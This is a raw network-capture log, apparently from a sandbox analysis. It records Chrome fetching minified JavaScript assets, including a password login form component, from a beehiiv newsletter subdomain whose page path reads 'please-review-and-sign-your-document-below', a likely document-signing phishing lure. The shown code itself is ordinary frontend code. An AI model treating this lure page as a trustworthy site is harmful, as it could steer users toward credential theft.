                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 35 63 33 39 39 64 30 2d 62 36 34 38 2d 35 30 62 38 2d 62 34 63 63 2d 64 37 31 35 66 34 61 65 65 34 30 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="75c399d0-b648-50b8-b4cc-d715f4aee401")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC944INData Raw: 3d 3d 6e 75 6c 6c 29 7b 6c 65 74 20 74 3d 6e 65 77 20 45 72 72 6f 72 28 22 59 6f 75 20 75 73 65 64 20 61 20 3c 44 65 73 63 72 69 70 74 69 6f 6e 20 2f 3e 20 63 6f 6d 70 6f 6e 65 6e 74 2c 20 62 75 74 20 69 74 20 69 73 20 6e 6f 74 20 69 6e 73 69 64 65 20 61 20 72 65 6c 65 76 61 6e 74 20 70 61 72 65 6e 74 2e 22 29 3b 74 68 72 6f 77 20 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 26 26 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 2c 63 29 2c 74 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 50 28 29 7b 6c 65 74 5b 6f 2c 74 5d 3d 6c 2e 75 73 65 53 74 61 74 65 28 5b 5d 29 3b 72 65 74 75 72 6e 5b 6f 2e 6c 65 6e 67 74 68 3e 30 3f 6f 2e 6a 6f 69 6e 28 22 20 22 29 3a 76 6f 69 64 20 30 2c 6c 2e 75 73 65
                                                                                                                                            Data Ascii: ==null){let t=new Error("You used a <Description /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(t,c),t}return o}function P(){let[o,t]=l.useState([]);return[o.length>0?o.join(" "):void 0,l.use


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            66192.168.2.1649789104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC858OUTGET /assets/LoginWithPasswordAction-TVLpJaLq.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3658
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e4a-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aa2922c336-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 65 30 30 32 66 39 34 2d 62 39 38 35 2d 35 31 64 36 2d 62 36 61 37 2d 39 63 30 32 31 62 31 37 33 37 37 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2e002f94-b985-51d6-b6a7-9c021b173779")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 2e 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 42 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 45 7a 76 71 4c 59 39 32 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 49 20 61 73 20 75 7d 66 72 6f 6d 22 2e 2f 49 6e 70 75 74 2d 73 6e 4d 53 70 63 33 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 53 20 61 73 20 5f 7d 66 72 6f 6d 22 2e 2f 53 74 61 74 75 73 49 6e 70 75 74 73 2d 4a 6b 56 68 6b 5f 6a 67 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 52 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 52 65 64 69 72 65 63 74 54 6f 48 69 64 64 65 6e 49 6e 70 75 74 2d 6d 55 62 34 79 69 69 37 2e 6a 73 22
                                                                                                                                            Data Ascii: ./useToast-DK42uF07.js";import{B as b}from"./index-EzvqLY92.js";import{I as u}from"./Input-snMSpc3o.js";import{S as _}from"./StatusInputs-JkVhk_jg.js";import{u as x}from"./useTranslation-CfKJAmGY.js";import{R as y}from"./RedirectToHiddenInput-mUb4yii7.js"
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 65 2e 6a 73 78 28 75 2c 7b 6e 61 6d 65 3a 22 70 61 73 73 77 6f 72 64 22 2c 74 79 70 65 3a 22 70 61 73 73 77 6f 72 64 22 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 73 28 22 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 2c 6c 61 62 65 6c 3a 73 28 22 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 5f 6c 61 62 65 6c 22 29 2c 72 65 71 75 69 72 65 64 3a 21 6c 7d 29 2c 65 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 77 2d 66 75 6c 6c 20 66 6c 65 78 2d 63 6f 6c 20 69 74 65 6d 73 2d 65 6e 64 20 67 61 70 2d 79 2d 31 20 73 6d 3a 66 6c 65 78 2d 72 6f 77 2d 72 65 76 65 72 73 65 20 73 6d 3a 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 73 6d 3a 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 22 2c 63 68 69 6c
                                                                                                                                            Data Ascii: e.jsx(u,{name:"password",type:"password",placeholder:s("login.password_placeholder"),label:s("login.password_label"),required:!l}),e.jsxs("div",{className:"flex w-full flex-col items-end gap-y-1 sm:flex-row-reverse sm:items-center sm:justify-between",chil
                                                                                                                                            2025-01-15 18:14:35 UTC463INData Raw: 75 62 6d 69 74 74 69 6e 67 3a 73 7d 29 2c 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 61 2c 7b 61 73 3a 22 70 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 74 68 65 6d 65 3a 22 64 65 66 61 75 6c 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 74 28 22 6c 6f 67 69 6e 2e 73 69 67 6e 5f 75 70 5f 6c 61 62 65 6c 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 4e 2c 7b 74 6f 3a 22 2f 73 75 62 73 63 72 69 62 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 61 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 77 65
                                                                                                                                            Data Ascii: ubmitting:s}),e.jsx("div",{className:"flex flex-col",children:e.jsxs(a,{as:"p",size:"xs",type:"body",theme:"default",children:[t("login.sign_up_label")," ",e.jsx(N,{to:"/subscribe",className:"underline",children:e.jsx(a,{as:"span",size:"xs",type:"body",we


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            67192.168.2.1649791104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC840OUTGET /assets/Image-ycA_AFLr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1492
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"5d4-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aa6f2042f7-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 35 31 36 34 33 32 38 2d 61 34 33 64 2d 35 66 62 64 2d 62 33 39 31 2d 62 30 39 38 38 61 35 39 65 32 31 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c5164328-a43d-5fbd-b391-b0988a59e21e")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1035INData Raw: 76 2e 63 6f 6d 22 2c 22 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 6e 65 74 22 3a 22 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 63 6f 6d 22 2c 22 62 65 65 68 69 69 76 2d 69 6d 61 67 65 73 2d 73 74 61 67 69 6e 67 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3a 22 6d 65 64 69 61 2e 73 74 61 67 69 6e 67 68 69 69 76 2e 63 6f 6d 22 2c 22 73 74 61 67 69 6e 67 2d 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 6e 65 74 22 3a 22 6d 65 64 69 61 2e 73 74 61 67 69 6e 67 68 69 69 76 2e 63 6f 6d 22 7d 2c 76 3d 28 69 2c 73 29 3d 3e 7b 6c 65 74 20 65 3d 6e 75 6c 6c 3b 74 72 79 7b 65 3d 6e 65 77 20 55 52 4c 28 69 29 7d 63 61 74 63 68 7b 7d 69 66 28 21 21 21 28 65 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 29 2e 69 6e 63 6c 75 64 65 73 28 65 2e 68 6f 73 74 29 29 29 72
                                                                                                                                            Data Ascii: v.com","media.beehiiv.net":"media.beehiiv.com","beehiiv-images-staging.s3.amazonaws.com":"media.staginghiiv.com","staging-media.beehiiv.net":"media.staginghiiv.com"},v=(i,s)=>{let e=null;try{e=new URL(i)}catch{}if(!!!(e&&Object.keys(l).includes(e.host)))r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            68192.168.2.1649792104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC564OUTGET /assets/use-root-containers-DmyWFwuo.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4057
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"fd9-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aaab1743fd-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 36 66 31 38 37 63 61 33 2d 32 61 38 38 2d 35 64 31 32 2d 39 63 63 30 2d 63 65 32 34 66 62 36 61 37 31 66 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6f187ca3-2a88-5d12-9cc0-ce24fb6a71f1")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 48 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 66 20 61 73 20 54 2c 73 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 68 69 64 64 65 6e 2d 4b 75 6f 58 6d 69 4e 35 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 51 28 65 2c 74 2c 6c 2c 72 29 7b 6c 65 74 20 73 3d 62 28 6c 29 3b 6e 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 65 3d 65 3f 3f 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 61 28 75 29 7b 73 2e 63 75 72 72 65 6e 74 28 75 29 7d 72 65 74 75 72 6e 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 61 2c 72 29 2c 28 29 3d 3e 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 61 2c 72 29 7d 2c 5b 65 2c
                                                                                                                                            Data Ascii: .js";import{r as H}from"./components-Oj2xMfGE.js";import{f as T,s as x}from"./hidden-KuoXmiN5.js";function Q(e,t,l,r){let s=b(l);n.useEffect(()=>{e=e??window;function a(u){s.current(u)}return e.addEventListener(t,a,r),()=>e.removeEventListener(t,a,r)},[e,
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 76 29 2c 70 3d 53 28 29 3b 72 65 74 75 72 6e 20 45 28 28 29 3d 3e 7b 21 75 7c 7c 21 6f 7c 7c 75 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 7c 7c 28 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 22 2c 22 22 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 5b 75 2c 6f 5d 29 2c 45 28 28 29 3d 3e 7b 69 66 28 6f 26 26 66 29 72 65 74 75 72 6e 20 66 2e 72 65 67 69 73 74 65 72 28 6f 29 7d 2c 5b 66 2c 6f 5d 29 2c 4c 28 28 29 3d 3e 7b 76 61 72 20 63 3b 21 75 7c 7c 21 6f 7c 7c 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 26 26 75 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 26 26 75 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 2c 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3c 3d
                                                                                                                                            Data Ascii: v),p=S();return E(()=>{!u||!o||u.contains(o)||(o.setAttribute("data-headlessui-portal",""),u.appendChild(o))},[u,o]),E(()=>{if(o&&f)return f.register(o)},[f,o]),L(()=>{var c;!u||!o||(o instanceof Node&&u.contains(o)&&u.removeChild(o),u.childNodes.length<=
                                                                                                                                            2025-01-15 18:14:36 UTC855INData Raw: 3b 66 6f 72 28 6c 65 74 20 69 20 6f 66 28 6f 3d 61 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 68 74 6d 6c 20 3e 20 2a 2c 20 62 6f 64 79 20 3e 20 2a 22 29 29 21 3d 6e 75 6c 6c 3f 6f 3a 5b 5d 29 69 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 69 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 26 26 69 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 69 2e 69 64 21 3d 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 2d 72 6f 6f 74 22 26 26 28 69 2e 63 6f 6e 74 61 69 6e 73 28 73 2e 63 75 72 72 65 6e 74 29 7c 7c 69 2e 63 6f 6e 74 61 69 6e 73 28 28 70 3d 28 66 3d 73 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 66 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 29 3d 3d 6e 75 6c 6c 3f
                                                                                                                                            Data Ascii: ;for(let i of(o=a?.querySelectorAll("html > *, body > *"))!=null?o:[])i!==document.body&&i!==document.head&&i instanceof HTMLElement&&i.id!=="headlessui-portal-root"&&(i.contains(s.current)||i.contains((p=(f=s.current)==null?void 0:f.getRootNode())==null?


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            69192.168.2.1649793104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC841OUTGET /assets/dialog-CtpHvvfD.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 15043
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
